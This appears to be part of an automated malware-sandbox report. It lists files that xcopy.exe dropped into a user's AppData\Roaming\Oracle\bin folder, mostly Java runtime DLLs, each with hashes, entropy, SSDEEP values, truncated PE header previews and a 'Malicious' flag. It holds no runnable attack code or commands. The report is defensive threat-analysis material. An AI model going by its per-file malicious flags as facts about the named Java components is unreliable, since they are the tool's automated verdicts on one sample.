                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...D 6............!.........................0...............................@......AY....@.........................0...a............0..............."...!..............T............................................................................text............................... ..`.rsrc........0......................@..@v...................D 6.........8...d...d.......D 6.........d...............D 6.........$...........RSDS....V......Gs......api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg...0...a....edata...0..`....rsrc$01....`0.......rsrc$02.... .......V......Gs......cgJ.SD 6.................D 6.....................X.......P...............1...l...............Y...............P...............?...x...........0...Y...t...............................;...^...................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17888
                                                                                                                                                                                                                                  Entropy (8bit):6.384196070928042
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:uFvU4x0C5yguNvZ5VQgx3SbwA7yMVIkFGlPWthWENkEDnll1H+vBn:C5yguNvZ5VQgx3SbwA71IkFFx1MBn
                                                                                                                                                                                                                                  MD5:1F1D50AA4553E77F6B90AE13BD56A95C
                                                                                                                                                                                                                                  SHA1:CF421A298F485C2A000791E1840EDEDEEA19BAD0
                                                                                                                                                                                                                                  SHA-256:D343529D2A49CBB89D644DEAFCE573B873AB45E0BF57E2D906B2F2A964D7BD9A
                                                                                                                                                                                                                                  SHA-512:A08BDCC2883066A8BDB9336EEC5C7F8593202C367CE75A7D7390ED4C6E0E1DBE80B7AFADEEE78F12AC0386D70AC360AF12BF0FF3285ACDA0425789038951F180
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L................!.........................0...............................@.......U....@.........................0................0...............$...!..............T............................................................................text............................... ..`.rsrc........0....... ..............@..@v.............................9...d...d.................d.........................$...........RSDS.....y.PI.....A....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg...0........edata...0..`....rsrc$01....`0.......rsrc$02.... ........y.PI.....A.......}hk.....................L...............X... .......w.......................%...C...b...........................:...\...{.......................:...[...{.......................@...a...............

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13792
                                                                                                                                                                                                                                  Entropy (8bit):6.687731230798941
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ry5NDCWthWVWf9BvVVWQ4SWxnYMdn2KqnajySH2rm:rUEWthWwNunll1H2rm
                                                                                                                                                                                                                                  MD5:FA5327C2A3D284385D8DC3D65935604B
                                                                                                                                                                                                                                  SHA1:A878B7CDF4AD027422E0E2182DAD694ED436E949
                                                                                                                                                                                                                                  SHA-256:704AD27CAB084BE488B5757395AD5129E28F57A7C6680976AF0F096B3D536E66
                                                                                                                                                                                                                                  SHA-512:473FF715F73839B766B5F28555A861D03B009C6B26C225BC104F4AAB4E4EA766803F38000B444D4D433FF9EA68A3F940E66792BAE1826781342F475860973816
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.................!......................... ...............................0......@.....@.........................0................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................7...d...d..................d..........................$...........RSDS.....T..+...........api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg...0........edata... ..`....rsrc$01....` .......rsrc$02.... ........T..+.......Xe!bm...F.|..........................(.......H...H...X...x.......P...m.......................,...J...h...........................5...V...t.......................'...K...o......................./...Q...v.......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.859998517027933
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:pmXI6fHQdufWthWakWf9BvVVWQ4SWHLUKtkqnajOyr39u:p+fZWthWaRNHlqyrI
                                                                                                                                                                                                                                  MD5:CEFAB9071EC289D88BB312816E62CA82
                                                                                                                                                                                                                                  SHA1:BD95BD97332EA21506171924ACDE4F4248A2EE6A
                                                                                                                                                                                                                                  SHA-256:340CED80FBCFCA804925FF680DA1929F68B95959FD7E4D0C9F67322BB5FE2155
                                                                                                                                                                                                                                  SHA-512:03C4B2B155392DC02370994D28B78D18C38CCBB0C594866AE31DB54111F0F18E264E1378ACDE0F2638E19871D7E3DF7CA3365AD63C0DE689C331F6E5B14E3582
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....-............!......................... ...............................0......l.....@.........................0...^............ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@v.....................-.........:...d...d.........-.........d.................-.........$...........RSDS.3&...q'xm%=.......api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg...0...^....edata... ..`....rsrc$01....` .......rsrc$02.... ....3&...q'xm%=...f............-...............-.....................X.......H..............."...C...\...u...........................!...8...K...`...{...............................'...>...T...i.......................<...S...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1224832
                                                                                                                                                                                                                                  Entropy (8bit):6.596601401904231
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:JYFJ6mhjurzTILfgikyNZ0mZ/VNGqhHfaU4Y0NM+fg5LD6ipY4OxJWf3AyH5O:SSrxcC4OxJ6HU
                                                                                                                                                                                                                                  MD5:E6C872D5414D5A8F3D0A77462B0E8F6C
                                                                                                                                                                                                                                  SHA1:9398D1185DA36810ECE1D6723877C212069C2D09
                                                                                                                                                                                                                                  SHA-256:3FCF3FA5DB848A25C311285DB04C944D89FE1829DA690E541B24CE8797A26833
                                                                                                                                                                                                                                  SHA-512:DC8943E51A88553B0E24D66368F6A67D0024C519007E657BF1851F3EE222CF4634C552B86AE188F752137F2E165261BDDA87F2727422B555D6554C6A9390F145
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}Kl..Kl..Kl..B.+.]l..)../Ol..)../Gl..)../Cl...../Ol..)../Vl.._../Ml.._../Ll..Kl..rn...../+l...../.l...../Jl....G.Jl...../Jl..RichKl..........PE..L.....d...........!......................... ......................................^.....@................................x...|........N...............(......p...L...T...............................@............ ..H...d...`....................text...<........................... ..`.rdata....... ......................@..@.data...........|..................@....rsrc....N.......P...L..............@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21632
                                                                                                                                                                                                                                  Entropy (8bit):6.75051196599311
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:5SR9y3pMJ9jltZOVseVuZf3sIYi1oGPxh8E9VF0NyWXa:5Sn8M1QbVuZfNYi/PxWEAq
                                                                                                                                                                                                                                  MD5:850467BDAB490EA654FE6EB9138DE546
                                                                                                                                                                                                                                  SHA1:2FAD536F6A157B77C7672B956AD8ED0BEB4B5EC0
                                                                                                                                                                                                                                  SHA-256:DC145E89896CA329058084E5375437F8E8170950B089FD2E2F748A6FEC4EC2A3
                                                                                                                                                                                                                                  SHA-512:9831005B2533D8C20A2892A13590DD89A19523CBD047B573A2EF90E508F0BC4BA9E740FD0C055CC51C0DED62B8F34B6B1B7D5A882429726CB5DD835265B235CB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........SY...Y...Y...P.j._...;...[...M...Z...Y...x...;...R...;...S...;...X......X......X......X......X...RichY...........PE..L...|.d...........!.........................0...............................p......nn....@......................... 8.......8..x....P...............,...(...`.......3..T........................... 3..@............0..x............................text...{........................... ..`.rdata..|....0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc.......`.......*..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\client\Xusage.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1423
                                                                                                                                                                                                                                  Entropy (8bit):4.176285626070561
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:N3ZYKm8fuW6psByGJjR0X46kA2SsGFhD+GbpGCOhLRr3n:mOLUskGJjyltsGFV+GbpGCOTr
                                                                                                                                                                                                                                  MD5:B3174769A9E9E654812315468AE9C5FA
                                                                                                                                                                                                                                  SHA1:238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
                                                                                                                                                                                                                                  SHA-256:37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
                                                                                                                                                                                                                                  SHA-512:0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview: -Xmixed mixed mode execution (default). -Xint interpreted mode execution only. -Xbootclasspath:<directories and zip/jar files separated by ;>. set search path for bootstrap classes and resources. -Xbootclasspath/a:<directories and zip/jar files separated by ;>. append to end of bootstrap class path. -Xbootclasspath/p:<directories and zip/jar files separated by ;>. prepend in front of bootstrap class path. -Xnoclassgc disable class garbage collection. -Xincgc enable incremental garbage collection. -Xloggc:<file> log GC status to a file with time stamps. -Xbatch disable background compilation. -Xms<size> set initial Java heap size. -Xmx<size> set maximum Java heap size. -Xss<size> set java thread stack size. -Xprof output cpu profiling data. -Xfuture enable strictest checks, anticipating futur

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\client\classes.jsa

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13565952
                                                                                                                                                                                                                                  Entropy (8bit):4.972247052793921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:kLVLl7EWrW8x5n9qEjuU+cYa1NWSJ4+57swH/ifQ60:kLVpEWr95n9qEjuU+cYa1NWq4++wf6
                                                                                                                                                                                                                                  MD5:705E60B27CB0A28F22A0BD5294E7EB8A
                                                                                                                                                                                                                                  SHA1:E09AE8DDA5EDB11A6027FC390C7DBA66C5B4E3E1
                                                                                                                                                                                                                                  SHA-256:02A9329C018FFB337BFC9C13793A082BEA27F342EFEE798617AAD65F4106EB8A
                                                                                                                                                                                                                                  SHA-512:BE14FF6A4A0662C1582E378DE4D7F44B497B7F442C9541F83A8FC3767207EB2C9A7E249531DBB28287F3BA78BD3AF280A5A7425BC670A2CFE917E5B51BF05651
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:......................f%..........Y..................E........[.....(.^.................j............ .,............................................................yD.................................Java HotSpot(TM) Client VM (25.381-b09) for windows-x86 JRE (1.8.0_381-b09), built on Jun 14 2023 13:49:45 by "java_re" with MS VC++ 17.1 (VS2022).ssl/SSLLogger.classPK...........n.V7........../.............*...sun/security/ssl/SSLMasterKeyDerivation$1.cl........@... ...9.0.................C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar;C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar;C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar;C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar;C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar;C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar;C:\Program Files (x86)\Java\jre-1.8\classes.....C:\Program Files (x86)\Java\jre-1.8\classes.....C:\Program Files (x86)\Java\jre-1.8\lib\meta-index.....D..d....N.................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4099712
                                                                                                                                                                                                                                  Entropy (8bit):6.796115717686572
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:UbvDcxULEeXOEl8MqRxawPNw3O8DWxv7Dcv/G9Htmu:+bcxMzOEl8JRswP6ecoDcv/GRtH
                                                                                                                                                                                                                                  MD5:8040D3E59F2BBC674A9D8C0A8468B660
                                                                                                                                                                                                                                  SHA1:BD46076ECBC18C87629CD6193DF552B3FA986159
                                                                                                                                                                                                                                  SHA-256:0DFBF8F6D8EE5D72222DE01760D5F5B0CF86C36C96B4C679330667FBBEF28C68
                                                                                                                                                                                                                                  SHA-512:2095FFF88E44D55D05FF167B7B92109332495A0C5A2538C177659C44A8D8681146DB64259E86343FE9770DEE82D748ACE31EB4624B50989A9BC2B45719019583
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............s...s...s....P..s......s...>..s......s......s......s.......s...s...r..c...q..c....s..c.<..s..c....s..Rich.s..................PE..L.....d...........!................q........................................p@......f?...@.........................P.7......8.|.....<.(............f>..(....<.p.....5.T.....................5......5.@...............t............................text...W........................... ..`.rdata..D...........................@..@.data...d.....8..8....8.............@....rsrc...(.....<.......:.............@..@.reloc..p.....<.......:.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):151680
                                                                                                                                                                                                                                  Entropy (8bit):7.314572838596142
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:wFWde2kcYRNSyp/npHm49IBcjGojGylYCE2Iu2jGLF5A9bE8LUevFQi8x7:FTkcYR4yp/npHPKCHGgYCE2L1F5A9bEp
                                                                                                                                                                                                                                  MD5:8095AC26DDF238926417CF965CFE5D39
                                                                                                                                                                                                                                  SHA1:E844748F5ED165331BB2DBDF5F92F681A0A8D38E
                                                                                                                                                                                                                                  SHA-256:33393A87E0A099F76868239255A4C74E51526BAE210A024FCA49ED8D4BFB5768
                                                                                                                                                                                                                                  SHA-512:BDE0914C0598393DC445EFB3B5600DD1324040E395BE22B5BFB370BD8D24FC4142C6A0639F2201C7DB4ACF33601FEFF3EFD0E05B85B151567892D77D36743ACD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........nb...1...1...1...1...1...0...1..0...1...0...1...0...1...0...1H..0...1...1...1H..0...1H..0...1H..1...1H..0...1Rich...1........PE..L.....d...........!.........^...............................................`............@..........................................@...............(...(...P......8...T...........................x...@............................................text............................... ..`.rdata...!......."..................@..@.data...,,.......(..................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):68736
                                                                                                                                                                                                                                  Entropy (8bit):6.489854163040045
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:dqoQ31OgXqMjSGXsZkSb3OHLnQZ/rbQSTVnB+7o2PxBZ:8oQFOtYSDZkSb3OHbyrMSTVnMEixn
                                                                                                                                                                                                                                  MD5:EBA45B30162DA35F4D167B5D05ED0901
                                                                                                                                                                                                                                  SHA1:12874272AE053CCBCBA4D3543E1816AC5E03D132
                                                                                                                                                                                                                                  SHA-256:94A4E180F3C6E75823B948AE37972DD559F11F5DA4C595EF70C40DEC49EAE988
                                                                                                                                                                                                                                  SHA-512:8897FFCC89EE3E84071B664E8EA86C1D2A159B192F4F9227309A1199BA30D4646423E401C80895F4300726DD96EA40AABBD028AF9D1862ED3D6A8BEC20EDB0F3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2vB.S...S...S...+...S...+...S...8...S...S...S...+...S...+...S...+...S..1*...S..1*...S..1*...S..1*...S..Rich.S..................PE..L...t..d...........!.........$............................................... ......0.....@.....................................d........................(......`...................................8...@...............t............................text...g........................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):448128
                                                                                                                                                                                                                                  Entropy (8bit):6.419081047643351
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:VudEcOaGfQygV/IU7kbyul8LC4OWLOOrsQ87MOCzJ0QMRtsokszvq+S:s2tFmR
                                                                                                                                                                                                                                  MD5:7CA505884DD1135214835D31FC6D021B
                                                                                                                                                                                                                                  SHA1:768BDFD47ED5EC942042A1B2A7ADF29F6A1A8F19
                                                                                                                                                                                                                                  SHA-256:D28B1D7FAC0A41FAAF2C4BB76E23ADB27B2AF0F857C480DA6BEA9047A2161E85
                                                                                                                                                                                                                                  SHA-512:148EA3DC9503A3940CE4E1C31286B88931F6720C95781D3F473AB7E4D55A427EA57E060EB9CDBD691142554AC3BD10056B82BC68198D4224F88D267129494A2E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........Y...8.@.8.@.8.@.@.@.8.@.@.A.8.@.@.@.8.@.@.A.8.@.@.A.8.@.S.A.8.@.@.A.8.@.S.A.8.@.S.A.8.@.8.@a9.@wA.A.8.@wA.A.8.@wA.@.8.@wA.A.8.@Rich.8.@........................PE..L.....d...........!.........$......................................................g.....@.............................L7..............................(.......1..P]..T....................].......[..@...............\....}.......................text...,........................... ..`.rdata..n@.......B..................@..@.data...<...........................@....rsrc..............................@..@.reloc...1.......2...|..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31872
                                                                                                                                                                                                                                  Entropy (8bit):6.780442867196149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:h7EnshGpP5U64e3xziyX3uYiecxhvPxWEYn:e/pP5WuiyX+7ecXvPxS
                                                                                                                                                                                                                                  MD5:48DD20D6A83E5E98CC1B98F7B86482C9
                                                                                                                                                                                                                                  SHA1:FEE29706239301D9E57996E2629D8E3BB5781573
                                                                                                                                                                                                                                  SHA-256:6B34A2987603C9BD67F603B34443C44BCB5CCFE6B4BA41C1175208652FDBD833
                                                                                                                                                                                                                                  SHA-512:266BEA9E6F7B5D3224FF8B701AAF470A933098CEC5ACA954B72EC4CFE3374ED8FD148A740FB2A6CC38DA8C7B717C081433073F72F584BCA6C3A712E617015EF4
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]Hv..)...)...)...Q...)..{Q...)...B...)...)..$)..{Q...)..{Q...)..{Q...)...P...)...P...)...P..)...P...)..Rich.)..........PE..L...|.d...........!.....0..."......m5.......@.......................................$....@..........................K......tO.......p...............T...(...........G..T............................F..@............@...............................text...9/.......0.................. ..`.rdata..N....@.......4..............@..@.data........`.......J..............@....rsrc........p.......L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28800
                                                                                                                                                                                                                                  Entropy (8bit):6.7414019314723586
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:v6xUIldHFlHx8jmuAq/Yu/BgKfRYihejPxWEih:vMUIfFtxUHJgKfR7cjPxo
                                                                                                                                                                                                                                  MD5:8D3351F4BBA2FFA6D6CE3F94F4549750
                                                                                                                                                                                                                                  SHA1:6470A1C8A514093C6F12801A55C40A3E320B170B
                                                                                                                                                                                                                                  SHA-256:906CAD967F82C14D46E36C441CAB46FA19896C04122BF568574829F563D54BB7
                                                                                                                                                                                                                                  SHA-512:32569EB88E839D3F10043E8816753C86665B970F93CE82EB969FDEDEE136FB173DAA9E1A40BBA4508BA6577597192496BC24EBA88EAEB89CAA09BF3BB71DC87C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P.*.1.y.1.y.1.y.Iqy.1.y.I.x.1.y.I.x.1.y.I.x.1.y.I.x.1.y.Z.x.1.y.1.y.1.y9H.x.1.y9H.x.1.y9H.y.1.y9H.x.1.yRich.1.y........................PE..L.....d...........!....."...$......j).......@......................................7.....@..........................P..X....P.......p...............H...(......X....L..T...........................XK..@............@...............................text....!.......".................. ..`.rdata..:....@.......&..............@..@.data........`.......>..............@....rsrc........p.......@..............@..@.reloc..X............D..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1080960
                                                                                                                                                                                                                                  Entropy (8bit):5.85029502348387
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:KwCzp5npcMqPS+jMxA8OTnmXXBqVoEyJl3GbWa8tfvChbOso6C6QJ1eOBwy8euCz:rCzpXcMvqmHcV3Gl3RBtwyv5tT
                                                                                                                                                                                                                                  MD5:AC5FD2FB7A6CA9B92E6CF1CABC9B2E02
                                                                                                                                                                                                                                  SHA1:9364252AC5167273DF51D1BF4218747114DEDEAF
                                                                                                                                                                                                                                  SHA-256:50C5BD67A4A8690184433EADFEEF8311B401B0E94F0FC616DA0BDE320DFF3D57
                                                                                                                                                                                                                                  SHA-512:A5BCD3C3C8C7C2151B18DB7ECF2DE7B6BF2262844BEA77F456DEAC1B974EF268DD489F82BEF4BCFBEACD72B185E365E2D38AF8460C94226A7AA8EEB2D083D97D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|..t...t...t.......t......?t.......t.......t.......t.......t.......t...t..qu.......t..z....t..z....t..z....t..z...t..z....t..Rich.t..........PE..L.....d...........!................................................................,c....@.........................0...............................V...(... ...e......T...............................@...............l............................text............................... ..`.rdata..............................@..@.data...lZ.......L..................@....rsrc...............................@..@.reloc...e... ...f..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1493120
                                                                                                                                                                                                                                  Entropy (8bit):6.160320483646551
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:ikJg/tKH74fS7bZNG06TAk2kfo05C1zsMCbOEWHB:iBEH74fSrbAfowtMCbOEWHB
                                                                                                                                                                                                                                  MD5:86AF77179B260F4880D95F0E28C5733F
                                                                                                                                                                                                                                  SHA1:927353D6837C9F9103EF640B966CC916F9E19C5F
                                                                                                                                                                                                                                  SHA-256:799F697575FDA9979A97211A7C61703C324ABCB3F09E1DDC4C7818299EF3F970
                                                                                                                                                                                                                                  SHA-512:680C3B2614CB6E22891661CB5B0FE1DD8388AEE3E537DCD3E7EBDBF8F46E69246A0E2B38AC6654434491D9CEA52EA8844F2DC1CB6BD285C753E1104B1F665397
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m]...3..3..3.g0..3.g6.y.3..t7..3..t0..3.g7..3.g2..3..2...3..t6...3.<u6..3.<u3..3.<u...3.<u1..3.Rich..3.........PE..L.....d...........!.....(...................@............................................@.........................`................P..P................(...P..........T...........................P...@............@..X............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data....L.......4..................@....rsrc...P....P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):138368
                                                                                                                                                                                                                                  Entropy (8bit):5.894743027883434
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:fq5Elgc7hOkcQbvXK2h8qdF5fwPdvBMI0DxI:fqu4kVvX3L5fSvxL
                                                                                                                                                                                                                                  MD5:E6B2BC78E9A937BD56A1D9FC7113FCEB
                                                                                                                                                                                                                                  SHA1:3726A1384908EFE489D9C8582A4C657CED26B553
                                                                                                                                                                                                                                  SHA-256:6B73FCEF2D0F5A12FEB16D9B2B0BAC4355EE35C2F5E2FB5454C026E5D341ADBB
                                                                                                                                                                                                                                  SHA-512:7D0D70936AE7C5E9D6DA42599DC9EFE1D8F84B8D425AFE3D31FD923CFCD4450999612983EE69726812AB159FF93499EC569BF723EB73C2405BF385737F83DC85
                                                                                                                                                                                                                                  Malicious:true
